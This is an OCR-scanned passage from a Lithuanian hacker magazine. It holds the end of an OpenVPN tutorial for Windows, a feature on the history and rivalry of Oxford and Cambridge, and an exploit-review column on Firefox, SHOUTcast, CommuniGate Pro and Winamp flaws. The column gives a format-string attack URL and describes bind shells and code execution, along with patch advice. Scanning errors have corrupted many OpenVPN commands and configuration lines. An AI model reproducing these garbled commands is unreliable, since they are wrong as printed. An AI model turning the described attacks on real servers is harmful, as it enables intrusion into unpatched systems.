rinktą potinklį). Potinklio kaukė abiem atvejais vienoda — 
255.255.255.0. Dar kartą noriu atkreipti tavo dėmesį, kad pasi- 
rinktas potinklis neturi būti naudojamas realiame lokaliame tinkle. 
Priešingu atveju tu negalėsi užmegzti VPN susijungimo! 

Dabar reikia sugeneruoti statinį raktą, kuris bus naudojamas tin- 
klo srautui šifruoti. Tam komandinėje eilutėje įvesk komandą: 


CAOpenVPN 
figNkey. nt“ 


openvpn.exe — pause-exit  verb 3 —genkey -sede! “LAOpenVPNNon- 


OpenVPN praktiškai akimirksniu sukurs 2048 bitų raktą ir įkels 
jį į bylą key.bt. Šį raktą reikia saugiai perduoti į nutolus; serverį. 
Šiuo atveju pasirinkimų daug: pavyzdžiui, galima jį pernešti dis- 
kelyje :). 

Pabaigę tvarkytis su raktais, griebsimės konfigūracinių bylų, kuriu 
pavyzdį gamintojai paslaugiai įkurdino kataloge c:|OpenVPN|sam- 
ple-configisample.ovpn. Pradėti reikia nuo šios bylos pervadinimo 
į config.ovpn ir perkėlimo | c:|OpenVPN|config katalogą. Po to ati- 
daryk ją su tekstiniu redaktoriumi ir pradėk redaguoti: 

remote < nutolusio kompiuterio IP adresas > 

4 Paremetias nurodo ieolų nutolusio kompiuterio IP adiesą, prie kurio bus jungiamasi 
dev tap 


A OpenVPN 2.0.2 Setup. 


“= Choose Components 
Choose which Features of OpenVPN 2.0.2 you want to instal 


Select the componenės to nstaljupgade, Stop any OpenVP processes or he OpentPN 
Service E kis running. AN DLLS are instaked bocaly. 


Select componerts toinstali | [Zi 
[2]openvPNRSA Cerhe Management Scripės 
[Z]OpenvPN Servas 
[2] OpenvPN Fie Assodations 
/] OpenssL DLLs 


<bak J Net> | [nd ] 


OnenVPN įdiegimas 


7 Taip vadinamos sąsajos tipas. OpenVPN atpažista keletą variacijų, ta 
mus domina būtent dev tap 

(config 10.3.0.1 255.255.255.0 

4 Su šiuo paromettu nurodytas IP adresas ir potinklio kaukė bus priski 
VPN susijungimui 

secret eNopentpnNconligN 

+ Absoliutus kelias iki bylos su I tukiu Atkieipk dėmesi į dvigubus slešu 

piną 10 

7 Ping parametras parodo tai, jog nutolęs kompiuteris kas 
siamas su specialiu ping poketu, taip patikrinan! susijung 

veb 3 

7 Logų del 

mute 10 

comp-lo 

7 Leitžiame tinklo srauto 


io kompiuto 


dešim! sekundžių bus apklau 


zvimo lygis (gali kūti nuo O iki 9) 


gudimą 
Kitoje mašinoje ši byla atrodys štai taip: 


remote 
dev lap 
ifconfig 10.3.0.2 255.255.255.0 
Secrel cANopenvpnNconfig Ney.ltl 
ping 10 

veib 3 

mute 10 

cony-io 


pirmojo kompiuterio IP adresas 


Iš esmės OpenVPN konfigūravimas baigtas. Sukryžiuok pirštus ir 
kiekvieno kompiuterio komandinėje eilutėje įvesk: 
openvpn —config cAoponvpnNconfiglconfią.ovpn 

Jeigu sisteminiame lauke (system tray) išnyko tinklo susijungi 
mo ikonėlė su užrašu Network cable unplugged, žali pradėti 
džiaugtis. Tai pirmas požymis, jog viskas suveikė taip, kaip pri- 
klauso. Kad būtum išties tikras, papingink nutolusias mašinas, 
panaudodamas jų vidinius VPN tinklo IP adresus, t.y. iš pirmo- 
sios mašinos paleisk ping 10.3.0.2, o iš antros — ping 10.3.0.1. 


[Vietoje išvadų] Šio straipsnio tikslas — parodyti, jog langinės 
visiškai sėkmingai gali būti panaudotos VPN/OpenVPN susijun- 
gimams kurti. Ši medžiaga jokiu būdu nepretenduoja į pilną 
dokumentaciją. Tai iš esmės neimanoma, kadangi labai daug 
kas priklauso nuo konkrečių tinklo nustatymų, jo topologijos ir 
to, ką tu naudodamas VPN nori pasiekti. 


LII 


OpenYPN paleidimas; ryšys užmegztas 
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vs Cambridge 


JEIGU ĮDĖMIAI SKAITAI „HAKERĮ“, TURĖ- 


ŽINOTI APIE MTI IR KITAS MO- 


KYMO IR MOKSLO ĮSTAIGAS, APIE KURIAS 
AŠ JAU PASAKOJAU. BŪTENT JOS Į PASAULĮ 
IŠLEIDŽIA ŽMONES, KURIE PADARO REVO- 


ATRADIMUS KOMPIUTERIJOS 
R BŪTENT JOSE ATLIEKAMI 


MOKSLO PASAULIUI SVARBŪS TYRIMAI. 
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SIUS BEI PRESTIŽIŠKIAUSIUS EUROPOS 


IR VISO PASAULIO UNIVERSITETUS. VISŲ 
PIRMA VERTA PAPASAKOTI APIE JŲ PRIEŠ- 


PRIEŠĄ, KURI TĘSIASI NUO NEATMENAMŲ 


LAIKŲ. 


UNITS 


Pasakojimas apie du 


prestižiškiausius Europos universitetus 

[Oksfordo universitetas] Istorikai nesugebėjo nustatyti tiks- 
lios jo įkūrimo datos. Rasti įrodymai, jog jame buvo dėstoma 
dar 1096 metais, tačiau tuomet Jis labiau priminė nedidelį ko- 
ledžą. 1167 metais Anglijos karalius Henrikas II uždraudė anglų 
studentams mokytis Paryžiaus universitete — didžiausioje se- 
nosios Anglijos aukštojo mokslo įstaigoje, dėl ko Oksfordas pra 
dėjo sparčiai augti. Galbūt čia įtakos turėjo palanki jo įkūrimo 
vieta arba gera reputacija, tačiau šiaip ar taip naujasis universi 
tetas tobulėjo ir plėtėsi. 1209 metais Oksfordo universiteto te 
ritorijoje įvyko išprievartavimas. Prievartautojo rasti taip ir nepa- 
vyko, todėl miestiečiai keršydami pakorė tris jo draugus. Šis 
atvejis sukėlė studentų protestų audrą, jie paliko Oksfordą ir 
pradėjo ieškoti naujų mokslo įstaigų. Anksčiau ten dėstę dėsty- 
tojai persikėlė į šiaurės rytus ir naują universitetą įkūrė Kembri 
džo mieste. Po keleto metų Oksfordo gyventojų prašymu į siu 
dentus kreipėsi Romos kardinolas Nikolas Romanus, kuris kvietė 
juos sugrįžti ir žadėjo daug lengvatų. Tai paveikė, ir gyvenimas 
universitete sugrižo į seną vagą. Iki XIX amžiaus pabaigos uni- 
versitete buvo griežti aukštojo laipsnio gavimo apribojimai. Pa- 
vyzdžiui, bakalauro laipsnis buvo suteikiamas tik tiems, kas pri- 
klausė Anglikonų Bažnyčiai, disidentai negalėjo gauti aukštes- 
nio už MA (Master of Arts — magistras) laipsnio, 0 norint gauti 
bet koki laipsnį, buvo privaloma gerai mokėti senovės graikų Ir 
lotynų kalbas. Moterims iki pat 1920 metų iš viso nebuvo |ei- 
džiama gauti mokslinio laipsnio. Dabar visi šie apribojimai ne- 
begalioja. Oksfordo universitetas įeina į tų Europos aukštojo 
mokslo įstaigų sąrašą, kuriose svarbius klausimus dėstytojai 


sprendžia kartu su įgaliotais studentais. Čia daugelis absolven- 
tų ir vyresniųjų kursų studentų taip pat moko savo jaunesniuo- 
sius mokslo „brolius“. Universiteto įstatymų leidybos centras yra 
Senatas, į kurį įeina visi Oksforde dėstantys akademikai. 
Mokslo metai universitete padalinti į tris 8 savaičių semestrus: 
dirmasis trunka nuo spalio iki gruodžio, antrasis — nuo sausio 
Iki kovo, o trečiasis — nuo balandžio iki birželio. Kiekvieno se- 
mestro programa labai intensyvi ir sudaryta taip, kad pertrauko- 
se tarp jų studentai kruopščiai ruoštųsi kitam. Įstojus galima 
Išsirinkti bet kurį iš 50 kursų. Čia dėstomi tiek įprastiniai (medi- 
cina, chemija, menų Istorija, kompiuterių Mokslai), tiek ir siau- 
ros specializacijos kursai (filosofija ir teologija, eksperimentinė 
psichologija, archeologija ir antropologija). Be kurso studentai 
gali pasirinkti ir savo gyvenamąją vietą (campus). Mokymosi pro- 
cesui tai neturi jokios įtakos šie „bendrabučiai“ skiriasi savo 
Interjerais (savaime suprantama, prieš 500 metų pastatytas 
studentams skirtas pastatas nebus panašus į naują) ir „gyven- 
tojais“. Norint supaprastinti studentų mokymąsi, daugelis ben- 
drabučių yra padalinti. Pavyzdžiui, studentams iš užsienio skir- 
tas atskiras pastatas, kaip ir žymių britų koledžų abiturientams. 
Prieš kelis šimtus metų mokestis už mokslą Oksforde buvo priei- 
namas tik pabaigusiesiems prestižines mokyklas ir koledžus. Vie- 
nintelė galimybė apie mokslą svajojantiems vargšams buvo pa 
tarnauti vyresniųjų kursų studentams ir taip gauti priėjimą prie 
vadovėlių ir paskaitų. Dabar, įvadus skirtingas apmokėjimo sąly- 
gas, mokestis už mokslą Oksforde priklauso nuo studento nuo- 
pelnų ir sugebėjimų, taip pat nuo jo šeimos pajamų. Prieš stoji- 
mą su kiekvienu žmogumi vyksta ilgas pokalbis, įskaitant testus ir 
Interviu. Ten jaunuoliai turi galimybę pademonstruoti savo žinias, 
parodyti savo darbus, įtikinti dėstytojus savo genialumu. Gabiau- 
sieslems studentams vieta bus garantuota net jei jie negali pilnai 
apmokėti savo mokslo. Taip pat dėl didelio stojančiųjų kiekio Oks- 
fordo ir Kembridžo universitetų vadovybės apribojo stojimo pa 
reiškimų teikimą. Metu eigoje tu gali pabandyti įstoti tik į vieną iš 
jų. Be abejo, paprasčiausia koledžų abiturientams, kurie iš anks- 
to ruošiami stojamiesiems egzaminams. Maždaug pusę Oksfor- 
do studentų sudaro būtent tokie čia taip vadinami „eruditai“. Kai 
kurie iš jų net ištisus metus papildomai mokosi, kad turėtų dau- 
giau galimybių stojamuosiuose testuose. 


Šia! tokiuose bendrabučiuose gyvena Oksfordo studentai 


Oksfordo miestas 


Oksfordo studentai visada daug dėmesio skyrė socialiniams už- 
siėmimams: sportui, muzikai, menams. Universiteto teritorijoje 
veikia daugybė pagal interesus susiskirsčiusių klubų, sporto sek- 
cijų (vien tik jų čia daugiau nei 70), būrelių. Čia yra studentų 
radijo stotis ir spaudos centras, kuriame leidžiami vietiniai laik- 
raščiai. 

Oksfordo universitetą baigė daug žymiu asmenybių, tarp jų 
12 karalių, 47 Nobelio premijos laureatai, 28 prezidentai, dau- 
giau nei 50 ministrų pirmininkų, 86 arkivyskupai, stambiausių 
pasaulio kompanijų vadovai. Iš konkrečių asmenų galima būtų 
paminėti www sukūrusį Timą Bernersą Ly, aktorių Hju Grantą, 
rašytoją Liuisą Kerolį, poetę Persi Šeli ir daugelį kitų. Oksfordą 
pabaigusių įžymybių sąrašą galima rasti oficialioje universiteto 
svetainėje, tai yra universiteto pasididžiavimas. 

Oksfordo mieste be pagrindinio universiteto yra ir kitų mokslo 
įstaigos. Kitas žinomiausias yra Oksfordo Brukso universitetas, 
taip pat dar vadinamas „politechu“. Įstojimo reikalavimai ten 
paprastesni, 0 ir mokymo programa ne tokia intensyvi. Likusieji 
institutai nėra tokie žinomi ir nėra susiję su šiomis dviem aukš- 
tojo mokslo įstaigomis, tačiau jie vis tiek populiarūs, kadangi 
juos pabaigę studentai gali darbdaviams tvirtinti pabaigę Oks- 
fordo universitetą. 


(do absolventas ir World 


Wide Web autorius Timas Berno 


Gegužės balius 
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Kembridžo „mėlynųjų“ sporto komanda 
[Kembridžo universitetas] Kembridžo universitetas — antra 
seniausia Didžiosios Britanijos aukštojo mokslo įstaiga. Kaip 
Jau buvo sakyta, jo įkūrėjais tapo Oksfordo dėstytojai, o pirmąjį 
universiteto miestelį Peterhauzą 1284 metais pastatė vysku- 
pas Hju Belšamas. Nuo to laiko iki pat mūsų dienų universite- 
tas nuolat plečiasi, statomi nauji miesteliai. 

Viduramžiais Kembridžo studentai turėjo melstis už jų universi- 
teto įkūrėjų sielas. Tai buvo net ne tradicija, o nerašytas įstaty- 
mas, todėl universitetas buvo priskiriamas abatijai, o jo stu- 
dentai — religiniams tarnams. Po to, kai karalius Henrikas VIII 
išformavo bažnytinės teisės fakultetą, griežtos bažnytinės tradi- 
cijos buvo nutrauktos, o universiteto programa pasuko | labiau 
gwenimiškus mokslus: matematiką, fiziką ir literatūrą. Kaip ir 
daugelyje kitu anglų institutų, Kembridže ilgai mokėsi išskirtinai 
tik jaunuoliai. Pirmasis merginoms skirtas bendrabutis universi- 
teto teritorijoje buvo pastatytas tik 1869 metais, tačiau prireikė 
dar beveik 100 metų, kad jos galėtų save vadinti pilnavertėmis 
studentėmis. 

Keletą amžių Kembridže mokytis galėjo tik turtuolių ir pareigū- 
nų vaikai. Stojamuosiuose egzaminuose buvo reikalaujama ži- 
nių, kurios buvo suteikiamos brangiai apmokamose mokyklose 


Senato pastatas (kairėje) ir Kembridžo centre esanti universiteto bažnyčia (dešinėje) 


ir koledžuose. Besimokantieji paprastose mokyklose buvo pri- 
versti ieškoti paprastesnio universiteto. Priėmimo | Kembridžą 
sistema buvo pakeista tik 1960 metais, ir dabar norint patekti 
į studentų gretas jau nebūtina mokėti lotynų kalbą ar kitų egz0- 
tiškų dalykų. Kembridžo studentų miestelio teritorijoje yra 31 
bendrabutis, kiekviename kurių taikomos savos priėmimo tai- 
syklės. Vienuose priimami tik tam tikrų mokyklų abiturientai, 
kituose — tik aspirantai, trečiuose bendrabučiuose priimamos 
išskirtinai merginos. Kembridže dėstomų kursų yra 20-čia ma- 
žiau nei Oksforde, jie aprėpia pagrindines žinių sritis. Vis dėlto ir 
egzotikos. Pavyzdžiui, kursas ilgu pavadinimu: „anglosaksų, skan- 
dinavų Ir keltų istorija“. Arba „veterinarinė medicina“ 
Kembridžo universitetas laikomas viena geriausių tiksliųjų mokslų 
ir technologijų mokyklų pasaulyje. Čia ypatingai išgarsėjo ketu- 
rių metų matematikos kursas Part III, kuris yra itin sudėtingu, 0 
tuo pačiu ir prestižiniu. Net ir talentingiausiems puikiai pabai- 
gusiems koledžą bei rimtai besidomintiems matematika abitu- 
rientams Part III tampa rimtu išbandymu. Britanijos kompanijos 
tai žino, todėl jų akyse sėkmingas šio kurso pabaigimas prilygi- 
namas aukštojo mokslo laipsnio gavimui kokiame nors kitame 
universitete. Universitetas taip pat tapo mėgstama iš visų Euro- 
pos galų suvažiuojančių profesorių ir tyrinėtojų paskaitų skaily- 
mo vieta. Kai kurie jų pakviečiami, daugelis patys atvažiuoja. 
Paskaitos gali būti pačios įvairiausios, o jose susiburia pilnos 
salės klausytojų. 

Kembridžo universitete egzistuoja per šimtą studentų organiza- 
cijų. Stambiausia jų ir tuo pačiu viena seniausių studentų orga- 
nizacijų pasaulyje yra Suvienyta Kembridžo Sąjunga. Ji buvo įkurta 
1915 metų vasarį kaip nedidelis bendravimui skirtas klubas, 
tačiau greitai virto įtakinga organizacija, kuriai priklausė garbiausi 
Kembridžo gyventojai ir kur buvo svarstomi visi svarbiausi klau- 
simai. Dabar ši Sąjunga, kuriai vadovauja prezidentas, turi aiš- 
kiai apibrėžtą struktūrą, universiteto gyvenime ji užima labai svar: 
bią vietą. Net Sąjungos viduje vykstantys debatai nusipelno di- 
džiausių pasaulio laikraščių ir žurnalų dėmesio 

Kita įdomi studentų organizacija „Kembridžo apaštalai“. Tai 
uždaras ir net slaptas intelektualų klubas, kur sudaro neva 12 
protingiausių universiteto studentų. Šio klubo susitikimai vyksta 
šeštadienio vakarais, tuo metu vienas iš dalyvių skaito paruoštą 
kalbą laisvai pasirinkta tema, o vėliau ją visi svarsto. Potencialūs 
klubo nariai, kuriuos „apaštalai“ vadina „embrionais“, ilgai stebi- 
mi ir galų gale pakviečiami į specialų vakarėlį. Ten ir nusprendžia- 
ma, ar jie verti būti klubo nariais. Universiteto teritorijoje vyksta 
daug įdomių renginių, kurių iniciatoriais tampa patys studentai. 
Pavyzdžiui, tradicinis Gegužės balius, kuris organizuojamas birželį 
(gegužę dar mokomasi). Jis prasideda 9 vakaro ir trunka iki pat 
ryto. Kostiumais ir vakarinėmis suknelėmis pasipuošę studentai 
ir studentės susirenka sode, kur bendrauja, plaukioja gondolose. 
Beje, bilietas kainuoja nepigiai — nuo 80 iki 160 svarų. Panašūs 
renginiai vyksta kiaurus metus ir toli gražu ne visada yra tokio 
formalaus pobūdžio. Kai kurie jų labiau primena po atviru dangumi 
vykstančius vakarėlius su elektronine muzika ir alumi. 
Kembridžo universitetas palaiko gerus santykius su Iegendi- 
niu MTI ir yra glaudžiai susijęs su pirmaujančiomis IT sferoje 
dirbančiomis Didžiosios Britanijos kompanijomis. Miestelio 
teritorijoje yra didelis rajonas, pavadintas panašiai kaip Sili- 
cio slėnis — Silicio pelke (Silicon Fen). Daugelis šiuolaikini 
technologijų „varikliukų“ ten turi savo biurus ir laboratorijas, 
todėl ši vieta laikoma vienu svarbiausių Europos technologi- 


nių centrų. „Pelkės“ teritorijoje atliekami tyrimai tokie svar- 
būs, jog juos dosniai finansuoja net pačios, kaip „Microsoft“ 
ir „Intel“. 


[Legendos ir tradicijos] Dviejų seniausių aukštojo mokslo įstai- 
gu Istorija pilna tiek įdomių bei linksmų, tiek ir dramatiškų įw- 
kių. Vienu žymiausių Oksfordo istorijos epizodų tapo kautynės, 
vykusios 1355 metų vasarį nuo 10 iki 12 dienos. Viskas prasi- 
dėjo nuo ginčo miesto tavernoje tarp miestiečių ir dviejų stu- 
dentų, kur jų nuomonės išsiskyrė dėl vietinio alaus kokybės. 
Žodžių mūšis greitai peraugo į muštynes. Incidentas tuo nesi- 
baigė: kitą dieną studentai surinko savo bičiulius ir, apsiginkla- 
vę viskuo, kas pakliuvo po ranka, išėjo į miestelį ieškoti kaltų. 
Miestelėnai buvo pasiruošę duoti atkirtį. Kruvinos pjautynės tę- 
sėsi dvi dienas ir baigėsi 63 studentų ir daugiau nei 30 mies- 
tiečių mirtimi. Nuo to laiko Oksforde vasario 10 dieną kasmet 
vyko mirusiųjų pagerbimo maršas, o miestelio vadovybė tradi- 
ciškai mokėjo baudą po 1 pensą už kiekvieną iš 63 užmuštų 
studentų. Ši tradicija baigėsi 1825 metais, kuomet marše atsi- 
sakė dalyvauti naujasis meras. 

Viena Iš svarbiausių Kembridžo įžymybių yra matematinis tiltas. 
Pasak legendos, jį pastatė Izaokas Niutonas. Beje, jis buvo su- 
konstruotas taip, jog galėjo laikytis be jokių varžtų ir sraigtų. 
Vėliau paaiškėjo, jog taip nėra tiltas pastatytas praėjus 22 
metams po įžymiojo mokslininko mirties. Tuomet jis laikėsi su 
geležiniais sutvirtinimais, kurių iš šono praktiškai nesimatė, ir 
tik vėliau jis buvo restauruotas panaudojant šiuolaikines me- 
džiagas. Vis dėlto istorija apie paties Niutono pastatytą tiltą 
gyva Iki šiol ir yra perduodama iš lūpų į lūpas. 

Kita Kembridžo legenda, šį kartą tikra, yra istorija su mediniais 
šaukštais. Iki 1909 metų jais buvo apdovanojami studentai, 
Aure baigiamajame matematikos egzamine surinkdavo mini- 
malų balą. Paskutinis šaukštelis atiteko tokiam Katbergui Lem- 
praeriui, kuris irklavimą mėgo labiau už mokslus. Jam atitekęs 
prizas buvo metro Ilgio, o rankenos forma priminė irklą. Ši links- 
ma tradicija nutrūko po to, kai viešai pateikiami egzaminų re- 
zultatai buvo išrūšiuoti abėcėlės tvarka, o ne „nuo geriausio iki 
blogiausio“, kas apsunkino laimėtojo nustatymą. 

Kiekvienais metais televizijos kanalas BBS iš Kembridžo Ka- 
ledų išvakarėse transliuoja į krikščionis orientuotą „Devynių 
pamokų ir dainų festivalį“. Ši tradicija prasidėjo 1928 me- 
tais, pasirodžius Eriko Milnerio-Vaito vadovaujamai mokyto- 
Ju grupei, kuri patarnavo bažnyčioje Kalėdų išvakarėse. Tai 
tęsasi iki šiol. 


[Amžių priešprieša] Per keletą amžių tarp dviejų universitetų 
vyksta įnirtinga konkurencija. Visų pirma tai susiję su sportu, 
kuriam abiejų universitetų studentai skiria daug laisvo laiko. Kas- 
met vyksta irklavimo, regbio, futbolo, krepšinio, kriketo, bokso 
Ir šachmatų varžybos... 

Pirmuoju rimtu studentišku turnyru tapo 1827 metų liepos 4 
dieną įvykęs kriketo turnyras. Vis dėlto ypatingą studentų popu- 
llarumą pelnė lenktynės su baidarėmis. 1829 metais Kembri- 
džo studentas Čarizas Merivelis pakvietė savo bičiulį iš Oksfor- 
do Čarizą Vordvorfą draugiškai pasirungti irklavime. Pirmą kartą 
pralaimėjęs, kitais metais jis pabandė atsirevanšuoti. Šį kartą 
jam pavyko laimėti, o rungtynės tapo kasmetinėmis ir išpopu- 
liarėjo ne tik tarp šių dviejų universitetų studentų, bet ir tarp 
visų Didžiosios Britanijos gyventojų, kurie mielai jas žiūri per 


BBC. Daugelį metų komandos tai laimėdavo, tai pralaimėdavo, 
o apginti universiteto garbę sportininkams tapo principo reika- 
lu. Šiuo metu rezultatas yra 78-72 Kembridžo naudai, visa tai 
kruopščiai registruoja sporto komitetas. 

Geriausi Oksfordo ir Kembridžo studentai sportininkai apdo- 
vanojami „Mėlynojo“ garbės vardu. Mėlyniesiems už jų nuo- 
pelnus įteikia mėlynos spalvos apranga: nuo šalikų iki kakla- 
raiščių. Vis dėlto aukščiausiu apdovanojimu laikoma melyna 
striukė — tai liudija, jog tu esi vienas iš geriausiųjų. Nepai- 
sant to, jog sportininkų paskatinimui mėlyna spalva naudo- 
jama abiejuose universitetuose, jų atspalviai skiriasi. Oksfor- 
de naudojama tamsiai mėlyna, o Kembridže — šviesiai mė- 
lyna. Geriausių sportininkų nustatymu ir apdovanojimu užsii- 
ma „Mėlynųjų Komitetas“, į kurį įeina pagrindinių sportų rū 
šių komandų kapitonai. Studentams dalyvavimas ir pergalė 
Oksfordo-Kembridžo varžybose yra tokie svarbūs, jog kai ku- 
rie iš jų net pasiruošę aukoti Olimpiadą, kaip, pavyzdžiui, 2004 
metais padarė irkluotojas Veinas Pomenas. 

Kita ne mažiau rimta priešprieša yra kova už „prestižiškiausiojo“ 
reputaciją. Su tuo susiję ginčai ir diskusijos per pastaruosius 
keletą amžių nenutilo nė vienai dienai. Oksfordas yra britų spau- 
dos numylėtinis, apie jį rašoma dažnai ir daug. Nors tarptauti- 
niame universitetų reitinge Kembridžas yra antroje vietoje po 
Harvardo, kai tuo tarpu Oksfordas tik dešimtoje. 
Forumuose visi sutinka, jog tiems, kas nori studijuoti tiksliuo- 
sius mokslus (fiziką, matematiką), geriausia rinktis Kembridžą. 
Jame geriau finansuojami moksliniai tyrimai — būsimiesiems 
mokslininkams tai geriausios sąlygos. Be to, Kembridžo mieste 
daugybė IT kompanijų, kas leis absolventui lengvai susirasti ge- 
rai apmokamą darbą. Tiems, kas linksta į humanitarinius moks- 
Jus, geriau rinktis Oksfordą. Taip daryti labiau verta bent todėl, 
jog šis universitetas daugiau nei bet kuris kitas pasauliui davė 
rašytojų, poetų ir literatų. 

Kaip ten bebūtų, abu universitetai prestižo atžvilgiu darbdavių 
akyse yra vienodi ir bet kurio jų diplomas suteikia kelialapį į 
įdomų gyvenimą. 


„Karališkasis“ 


seniausias Kembridžo bendrabutis 
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EKSPLOITŲ APŽVALGA 


FIREFOX LOCATION.GUERY 
INTERFACE() EXPLOIT 


[Aprašymas] Jeigu tu reguliariai skai- 
tai šią mūsų apžvalgą, turėjai girdėti ne- 
seniai nuskambėjusį „saugios“ naršyk- 
lės FireFox pažeidžiamumą, kuris per- 
pildžius puslapio antraštę sukelia buf- 
fer overflow. FireFox vartotojams tai la- 
bai nepatiko, tačiau po kiek laiko varto- 
tojai pamiršo šią negandą ir toliau nau- 
dojosi ugnine lapute. 

Po kiek laiko, vasario 7 dieną, bugtrag 
forumuose pasirodė pranešimai apie 
naujus Mozilla Firefox pažeidžiamu- 
mus. Šį kartą jų surasta net 7. Pagrin- 
de visos klaidos slypi JavaScript apdo- 
rojime. Viena klaida nusipelno ypatin- 
go dėmesio, kadangi buvo išleistas ją 
išnaudojantis eksploitas. Ši klaida sly- 
pi neteisingame Location.Ouerylnterfa- 
ce metodo apdorojime, dėl ko galima 
perpildyti buferį ir įvykdyti laisvai pasi- 
rinktą kodą. Grakščiai parašytas Perl 
eksploitas atidaro soketą ir laukia pri- 
sijungimų. Po susijungimo eksploitas 
užpildo atmintį, o po to iškviečia Loca- 
tion.Ouerylnterface. Dėl to įvyksta per- 
pildymas ir Firefox miršta. 


[Apsauga] Aprašyti pažeidžiamumai eg- 
zistuoja 1.5 versijoje ir visose ankstes- 
nėse laidose. FireFox 1.5.1 versijoje vi- 
sos klaidos jau ištaisytos. Jeigu progra- 
mos nustatymuose aktyvuotas automa- 
tinis versijos atnaujinimas, tuomet nar- 
šyklė iš karto tai padarys, priešingu atve- 
ju rekomenduoju iš www. mozilla.org par- 
sisiųsti naujausią programos laidą. 


[Nuorodos] Eksploitą gali rasti šiuo ad- 
resu: Www.xakep.ru/post/30043/de- 
fault.asp. 


[Blogio įvertinimas ir potencialas] Dau- 
gelis sako, kad FireFox, lyginant su IE ir 
Opera, yra pati saugiausia programa. Vis 
dėlto paskutinės bugtrag naujienos tikrai 
verčia susimąstyti apie saugumą ir galbūt 
pereiti prie kitos naršyklės. 


[Sveikinimai] Deja, eksploito autorius |i- 
ko šešėlyje, tačiau žinoma, kad eksploi- 
tas pirmą kartą pasirodė svetainėje 
www.metasploit.com. 


SHOUTCAST REMOTE 
FORMAT STRING VULNERABILITY 


Aprašymas 

Visiems žinoma programinio produkto 
SHOUTeast kilmė. Šis „NullSoft“ projek- 
tas leidžia internete transliuoti muzikinį 
srautą. Ne taip senai programoje buvo 
aptikta triuškinanti klaida, dėl ko pažei- 
džiamoje sistemoje gali būti paleistas lais- 
vai pasirinktas kodas. Kitaip tariant, eilu- 
tės formatavimo pažeidžiamumas reali- 
zuojamas kreipiantis į serverį štai su to- 
kia užklausa: 


http://host:8000/content/Y6n.mp3. 


kur 36n — klastingoji fatališkas pasekmes 
sukelianti seka. 

Paleistas eksploitas kreipiasi į serverį, ku- 
riam perduoda specialų shellkodą, po ko 
mašinoje atidaroma (pribindinama) 7000 
jungtis su susietu komandų interpreta- 
toriumi. 


[Apsauga] Klaida slypi visose SHOUTCast 
versijose iki pat 1.9.4 laidos imtinai. Dėl 
to siekiant išsigelbėjimo būtų logiška ap- 
lankyti svetainę www.shoutcast.com Ir par- 
sisiųsti šviežiausią programinį produktą. 


[Nuorodos] Eksploitą ir išsamų skylės ap- 
rašymą galima rasti šiuo adresu: www.xa- 
kep.ru/post/29844/default.asp. 


[Blogio įvertinimas ir potencialas] Kiek- 
vienas save gerbiantis lokalus tinklas turi 
savo radijo serverį, o didžioji dalis tokių 
serverių muziką. transliuoja būtent per 
SHOUTCast (arba ICECast Linux sistemo- 
je, bet tokių mašinų mažiau). O dabar įsi- 
vaizduok, kiek Windows serverių hakeriai 
gali užkrėsti trojanais, įvertinus tai, jog dau- 
gelis tinklų prie savo resursų leidžia jung- 
tis ir iš išorės. 


[Sveikinimai] Už idėją dėkojame jaunuo- 
liui Tomasz Trojanowski (onestep), o už 
jos įgyvendinimą kepurę reiktų nukelti jau 
prieš kitą hakerį — Damian Put <pu- 
cik(Occteam.org> www.CC-Team.org. 


COMMUNIGATE PRO 
SERVER VULNERABILITY 


[Aprašymas] Mano kuklia nuomone, iki 
šio mėnesio pats saugiausias paštininkas 
buvo CommuniGate Pro, kurį gamina 
www.stalker.com. Taip buvo dėl to, kad 
Stalker produktą pateikdavo dvejetainiu 
(vykdomos bylos) pavidalu ir neplatino pre 
dukto išeities tekstų. Vis dėlto hakeri 
kažkaip surado klaidą LDAP komponen- 
te, kuri įvyksta apdorojant neigiamas ilgio 
reikšmes Basic Encoding Rules laukuose 
(LDAP veikia per 389 jungtį). Iš karto po 
skylės analizės buvo sukurtas galingas eks: 
ploitas, kuris užmuša pašto demoną 
Eksploitas parašytas su Python, reikia pa- 
redaguoti jo pradžioje esančius hostname 
ir port laukus. Po paleidimo eksploitas ser 
veriui pasiunčia lemtingąjį shellkodą, po ko 
Communigate Pro coredump'inasi. 


[Apsauga] Pažeidžiamos visos versijos iki 
5.0.7, kuri jau pateikta oficialioje pašto 
sistemos svetainėje. Taigi vienintelis tei- 
singas sprendimas — atnaujinti progra- 
minį produktą. Alternatyvus patarimas: su 
įmontuota ugniasiene nufiltruoti 389 
jungtį. 


[Nuorodos] Eksplcitą galima rasti adre 
su | www-xakep.ru/post/29884/de 
fault.asp. Pažeidžiamumo detalės kol kas 
neviešinamos 


[Blogio įvertinimas ir potencialas] Co 

muniGate Pro dėl savo galingumo yra vie 

nas iš populiariausių projektų. Ši elektron! 
nio pašto programa turi tiek POP3/IMAP tiek 
ir SMTP dalis, moka paštą pasiimti/siųsti 
panaudodama SSL, turi įmontuotus We! 

Mail, WebAdmin ir LDAP komponentus (pas 

tarasis jį ir pražudė :)). Dėl to tingūs admi 
nai pamėgo šį demoną, o dėl jo uždarumo 
iš viso pamiršo apie jo atnaujinimą. Užtai 
dabar hakeriams bus ką veikti. 


[Sveikinimai] Vėl reikėtų pasidžiaugti mū: 
sų kaimynais iš Rytų. Eksploitą parašė ha 
keris Jevgenijus Legerovas. Piktavalio socia- 
linė kilmė ir pašto adresas neskelbiami :) 


WINAMP < = 5.12 REMOTE BOF EXPLOIT 


[Aprašymas] Pereikime prie produktų, 
kuriais naudojasi kiekvienas save gerbian- 
tis žmogus. Šį kartą klaida buvo aptikta 
populiariame grotuve Winamp (5.12 ver- 
sijoje). Eilinis buferio perpildymas slypi ži- 
nomo grotuvo grojaraščių (playlist) apdo- 
rojime. Piktavalis gali sukurti atitinkamai 
suformuotą grojaraštį su jame neteisin- 
gai nurodyta parametro File1 reikšme (ku- 
rioje, savaime suprantama, įrašytas shel- 
Ikodas). Dėl to apdorotuvas perpildo bu- 
ferį ir įvykdo laisvai pasirinktą kodą. Eks- 
ploite demonstruojamas atvejis, kuomet 
užkrovus grojaraštį gali būti paleistas skai- 
čiuotuvas :). Beje, niekas hakeriui netruk- 
do pakeisti šį shellkodą | ką nors kita, kas 
Jam praverstų kur kas labiau. 

Eksploitas parašytas su C, paties kodo ja- 
me nedaug. Čia generuojamas grojaraš- 
tis su nepriimtina pažeidžiamo paramet- 
ro reikšme. Po to šis grojaraštis turi būti 
užkrautas į grotuvą. To pasekmės aprašy- 
tos aukščiau. 


[Apsauga] Oficialioje svetainėje www.wi- 
namp.com puikuojasi užrašas, kuris skel- 
